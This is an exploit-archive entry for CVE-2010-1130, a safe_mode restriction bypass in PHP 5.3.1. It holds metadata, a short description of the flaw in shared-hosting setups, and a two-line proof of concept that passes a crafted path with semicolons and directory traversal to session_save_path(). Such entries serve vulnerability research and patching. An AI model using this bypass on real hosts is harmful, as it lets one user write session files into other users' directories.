PHP 5.3.1 - 'session_save_path() Safe_mode()' Restriction Bypass Exploiot

Author: Grzegorz Stachowiak
type: dos
platform: php
port: 
date_added: 2010-02-11 
date_updated: 2014-06-03 
verified: 1 
codes: CVE-2010-1130;OSVDB-62582 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/38182/info

PHP is prone to a 'safe_mode' restriction-bypass vulnerability. Successful exploits could allow an attacker to write session files in arbitrary directions.

This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; the 'safe_mode' restrictions are assumed to isolate users from each other.

{

session_save_path(";;/byp/;a/../../humhum");
session_start();

}